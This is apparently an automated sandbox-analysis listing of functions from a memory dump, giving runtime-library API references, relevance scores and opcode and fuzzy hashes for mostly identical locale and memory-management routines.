                                                                                                            • Instruction Fuzzy Hash: FA01D671900629DBCF05DB60CA447BDB7B6BF45328F24800AE4116B2C0DFB4AD629B81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F06526E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065275
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06527F
                                                                                                            • int.LIBCPMT ref: 6F065296
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F0652B9
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0652D0
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0652F0
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0652FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767075461-0
                                                                                                            • Opcode ID: 4b1241b8bc4c35a26273466b66544aaa571e5da99d2668c6172e9ac88528fb8f
                                                                                                            • Instruction ID: bfba6a3835b7de6a82e11b8b7b866dc6816a335474f9b64537e95858fe8f70e9
                                                                                                            • Opcode Fuzzy Hash: 4b1241b8bc4c35a26273466b66544aaa571e5da99d2668c6172e9ac88528fb8f
                                                                                                            • Instruction Fuzzy Hash: 5B01D23590062A9BCF05DBA8CA41BBD77B2BF8532CF640509D4116B2D1DFB0AD568B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051666, Relevance: 9.4, APIs: 6, Instructions: 380memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Allocate$Max_value
                                                                                                            • String ID:
                                                                                                            • API String ID: 4124748770-0
                                                                                                            • Opcode ID: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
                                                                                                            • Instruction ID: 2d2eafec24b268c7fb78cba3d49179746e4d7f8ba88237a51f237343bc1dec86
                                                                                                            • Opcode Fuzzy Hash: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
                                                                                                            • Instruction Fuzzy Hash: 16C17272900319FFDB14DFA9D880A9FBBBAFF45254B1005AAE814D7241D771EA11CBE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05E16B, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 6F05E172
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1DB
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1ED
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E205
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E215
                                                                                                            • _Getvals.LIBCPMT ref: 6F05E237
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568BB
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3549167292-0
                                                                                                            • Opcode ID: 5f1613d908a44fe4e992e088a8d658f9b532a8a3e32ba0221b3b3006dfb9b6bb
                                                                                                            • Instruction ID: 5a86d52387b51dee96900d19db61df3489acb18be70ea900e9bcc43a13234524
                                                                                                            • Opcode Fuzzy Hash: 5f1613d908a44fe4e992e088a8d658f9b532a8a3e32ba0221b3b3006dfb9b6bb
                                                                                                            • Instruction Fuzzy Hash: 51219072D00318AADF18DFE4D944BDFBBA8EF05314F10845AF9199F285EBB49650CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057D0A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057D11
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057D1B
                                                                                                            • int.LIBCPMT ref: 6F057D32
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057D6C
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057D8C
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057D99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: fdfb4ae31d2693942282c5d597cec981c3f98c55256a8df5c5499ca362ed31d9
                                                                                                            • Instruction ID: c03a86301e4a054cb40cdada7f53c1763b08520271e5d51d11faa0c13dbb6568
                                                                                                            • Opcode Fuzzy Hash: fdfb4ae31d2693942282c5d597cec981c3f98c55256a8df5c5499ca362ed31d9
                                                                                                            • Instruction Fuzzy Hash: 9001D27590062ADBCF05DBA0CA44BBD77B2BF85328F244609D4156B2C0CFB4A9269B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057579, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057580
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05758A
                                                                                                            • int.LIBCPMT ref: 6F0575A1
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0575DB
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0575FB
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057608
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 4debb5bb45fde98561a4926a72b6a6cd8daf5cdaadc2d3855ed819c97ceb59b9
                                                                                                            • Instruction ID: 327a23c5ab9c9d18ca03bf7f89a846aa846b5f7ce6059afcdd6e0b8d33759c9a
                                                                                                            • Opcode Fuzzy Hash: 4debb5bb45fde98561a4926a72b6a6cd8daf5cdaadc2d3855ed819c97ceb59b9
                                                                                                            • Instruction Fuzzy Hash: 7701F9719006299BCF05DBA4CA447BD77B1BF45328F24440AD4116F3C0CFF4A962DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0655EC, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0655F3
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0655FD
                                                                                                            • int.LIBCPMT ref: 6F065614
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06564E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06566E
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F06567B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 227dea0fc2bb8fb225aa1d30429c4e54ed3b876e18b471cf18234b9e7907a9a9
                                                                                                            • Instruction ID: 201d58da2ac1fc724ad4f6a899b619afd8bb750bcf199bc4360135ae88e8197d
                                                                                                            • Opcode Fuzzy Hash: 227dea0fc2bb8fb225aa1d30429c4e54ed3b876e18b471cf18234b9e7907a9a9
                                                                                                            • Instruction Fuzzy Hash: EA01F535900A29DBCF05DBB4CA40BBE77B2BF45328F640509E4116B3D1DFB0A916CB82
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F06542D, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065434
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06543E
                                                                                                            • int.LIBCPMT ref: 6F065455
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06548F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0654AF
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0654BC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 81d73de713980821b5fc915940440fb4e75f6c3ae378bcacba98e3cf710f8027
                                                                                                            • Instruction ID: 92c9fbe0ceb0580cb492a74c56ae02fec3d5d0d8c6e9060ca89af0900dd9cfe8
                                                                                                            • Opcode Fuzzy Hash: 81d73de713980821b5fc915940440fb4e75f6c3ae378bcacba98e3cf710f8027
                                                                                                            • Instruction Fuzzy Hash: 3801F535900729DBCF05DBA8CA44BBEB7B2BF45368F240049E4106B3D2CFB4A912CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05744F, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057456
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057460
                                                                                                            • int.LIBCPMT ref: 6F057477
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0574B1
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0574D1
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0574DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 73418a04a99e7e89735d279c71686fd87aebd5bbb348029761f64d1e94b5209c
                                                                                                            • Instruction ID: 2ab87933d79d7eae56343785444881fc144aaf26259cd7668dc931dd2252c3bf
                                                                                                            • Opcode Fuzzy Hash: 73418a04a99e7e89735d279c71686fd87aebd5bbb348029761f64d1e94b5209c
                                                                                                            • Instruction Fuzzy Hash: E201D6319407299BCF05DB64CB447AD77B2BF45728F24440AE4146B2C0CFB19D66DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057C75, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057C7C
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057C86
                                                                                                            • int.LIBCPMT ref: 6F057C9D
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057CD7
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057CF7
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057D04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 876a6b7684fecec0d2ceed0498e7229f1d269c44ccb3d07fbe2d02d4cee5dc1b
                                                                                                            • Instruction ID: 71270e74e4297d0f0ceab9403f83b3897fda5d9badc92f18114b09448c045b67
                                                                                                            • Opcode Fuzzy Hash: 876a6b7684fecec0d2ceed0498e7229f1d269c44ccb3d07fbe2d02d4cee5dc1b
                                                                                                            • Instruction Fuzzy Hash: 1301267190072ADBCF01DBA4CB45BBD77B2BF45328F64004AD8106B2C0CFB09A22C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0574E4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0574EB
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0574F5
                                                                                                            • int.LIBCPMT ref: 6F05750C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057546
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057566
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057573
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 070fcb6c7e243f39434f294160aca3abd2a2f5d132cd5bda22a2f568ee74b1bc
                                                                                                            • Instruction ID: a4b6f69030437730628f76bb7049fb3453a484f6a3ac075b09522e06bb06ba05
                                                                                                            • Opcode Fuzzy Hash: 070fcb6c7e243f39434f294160aca3abd2a2f5d132cd5bda22a2f568ee74b1bc
                                                                                                            • Instruction Fuzzy Hash: 5401D23190462D9BCF05DBA0CA847AD77B2BF45368F644509D4106B3C1CFF0AA269B81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065398, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06539F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0653A9
                                                                                                            • int.LIBCPMT ref: 6F0653C0
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0653FA
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06541A
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065427
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 615741aed25f9eea7d872d28ffdb3cf8e40845b18207f1038ff2f489ef94798f
                                                                                                            • Instruction ID: 488b7b735b8239090ba841f9455642ca00d16b148e3fdf1375c6e9a5afbb71d7
                                                                                                            • Opcode Fuzzy Hash: 615741aed25f9eea7d872d28ffdb3cf8e40845b18207f1038ff2f489ef94798f
                                                                                                            • Instruction Fuzzy Hash: FA01F535904729DBCF05DBA8CA40BBEB7B2BF45728F240549E4106B2C1CFB0AE52CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0573BA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0573C1
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0573CB
                                                                                                            • int.LIBCPMT ref: 6F0573E2
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05741C
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05743C
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057449
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: d29f7c8fe92ea89ea86dfacbb3413c66ca9dfd79f7eb751f149069d42eca4848
                                                                                                            • Instruction ID: 3a693c09dda025705ae11518adbc8a6251aaf86386d7824c222e44d87ad1f284
                                                                                                            • Opcode Fuzzy Hash: d29f7c8fe92ea89ea86dfacbb3413c66ca9dfd79f7eb751f149069d42eca4848
                                                                                                            • Instruction Fuzzy Hash: 8601F57590062ADBCF05DBA4CB447BE77B2BF45328F24440AD4146B2C0CFB4AA66DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F057BE0, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057BE7
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057BF1
                                                                                                            • int.LIBCPMT ref: 6F057C08
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057C42
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057C62
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057C6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: ef966a55218bb6aff91eee1de9dbbbe0979c94882d5a00c4c4e7849697a74e35
                                                                                                            • Instruction ID: fc10d4cfd450492e71f458a4edd6bc759a0840643c3bc126732b3fa50f30307a
                                                                                                            • Opcode Fuzzy Hash: ef966a55218bb6aff91eee1de9dbbbe0979c94882d5a00c4c4e7849697a74e35
                                                                                                            • Instruction Fuzzy Hash: F701D6B19046299BCF05DBA4CB407AD7BB2AF45328F64450AD4116B3C1CFB0AE21DB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05E031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                            • Opcode ID: 48d803e3983f2eafb7dc72b8ca8c8247c581b3c9a1c677fa654f56b8acd633b1
                                                                                                            • Instruction ID: f12773197ed6076ee7b6929c508d3a4268f2a591e3aa1108066664ad95ec3c68
                                                                                                            • Opcode Fuzzy Hash: 48d803e3983f2eafb7dc72b8ca8c8247c581b3c9a1c677fa654f56b8acd633b1
                                                                                                            • Instruction Fuzzy Hash: 6121C1B1904B52AEDB21CF74899077BBFF8AF0D204F040A1EE499C7A82D374E655CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 597776487-0
                                                                                                            • Opcode ID: a98e9f83df23d522a4e71f08890986b03092bbc5d6636c8edf59f53ab4adb7e0
                                                                                                            • Instruction ID: 02289ff33f40289090c1b58290c6c4d0417d53395070ad23ffbfcf0b338e8d53
                                                                                                            • Opcode Fuzzy Hash: a98e9f83df23d522a4e71f08890986b03092bbc5d6636c8edf59f53ab4adb7e0
                                                                                                            • Instruction Fuzzy Hash: 81C11371A08209DFDF108F78CC40BAE7BFDAF86364F14656AD5A49B281F731AA41A750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F092B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3033488037-0
                                                                                                            • Opcode ID: 48904d907a675dae2dbeac6fcf09abc75b07d058050d980a57baada8610152bb
                                                                                                            • Instruction ID: 27195d4a6bd25ab5779c4fccc23375304620b692334907668d976880b2230131
                                                                                                            • Opcode Fuzzy Hash: 48904d907a675dae2dbeac6fcf09abc75b07d058050d980a57baada8610152bb
                                                                                                            • Instruction Fuzzy Hash: CC51F072A00705AFDB11CF69CD80BAA77F9EF48724F54556AE819DB290F731EA01DB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05E244, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 2404127365-0
                                                                                                            • Opcode ID: 9237c9634faff5291540bba545202f19b7a1ab7cdb9fea1b2605ea5700b26fb1
                                                                                                            • Instruction ID: 345acad25d90dc5e158c516392f9296443e20be13a28f6a7014189bc3251f7ed
                                                                                                            • Opcode Fuzzy Hash: 9237c9634faff5291540bba545202f19b7a1ab7cdb9fea1b2605ea5700b26fb1
                                                                                                            • Instruction Fuzzy Hash: 6F2189B5C00348AADB14DFE5C984B9FBBB8EF85304F00844AF9159F295EBB0E650CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0567FA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 2020259771-0
                                                                                                            • Opcode ID: 497018d5bf681ea43fd2957ad9186fadbae655563c15be32ada046ba1595cb08
                                                                                                            • Instruction ID: 8bd3a21cd2ea6de165e37a24b9b0dcf162ab81b194169f2421ee1258edc51282
                                                                                                            • Opcode Fuzzy Hash: 497018d5bf681ea43fd2957ad9186fadbae655563c15be32ada046ba1595cb08
                                                                                                            • Instruction Fuzzy Hash: 94118FB1904745BFE720CBE5D940F12F7ECAB06614F04861AF244CB680D7B4F9608BA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 6F09CEFD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09CF0F
                                                                                                            • _free.LIBCMT ref: 6F09CF21
                                                                                                            • _free.LIBCMT ref: 6F09CF33
                                                                                                            • _free.LIBCMT ref: 6F09CF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 7785394202896f354cb6fdaaf58be89608731bf3d8d3e4f526a95999c8a6bf26
                                                                                                            • Instruction ID: 645f28c00cbc64f63cdc759d2ff3026ed925e175ad1e5e83973181500c503f6c
                                                                                                            • Opcode Fuzzy Hash: 7785394202896f354cb6fdaaf58be89608731bf3d8d3e4f526a95999c8a6bf26
                                                                                                            • Instruction Fuzzy Hash: 90F09631B09B05978F01CF58E194FD737DDAA097247A8A806F428D7582E730F880AAD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F046020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Smanip$task
                                                                                                            • String ID: .
                                                                                                            • API String ID: 1925983085-248832578
                                                                                                            • Opcode ID: 4b41ea781811e630ff1d789c88b697b356592b52aff7bf56500c5108ecfed2f5
                                                                                                            • Instruction ID: b8c5378a4252ac098d3b0ab02ad0449f8b77eccccc9051a64f554afcca11e8ce
                                                                                                            • Opcode Fuzzy Hash: 4b41ea781811e630ff1d789c88b697b356592b52aff7bf56500c5108ecfed2f5
                                                                                                            • Instruction Fuzzy Hash: 4D816571D00615DFCB08CFA8CE90BEDBBB5FB46314F208169D90697292E7386A58EF54
                                                                                                            Uniqueness

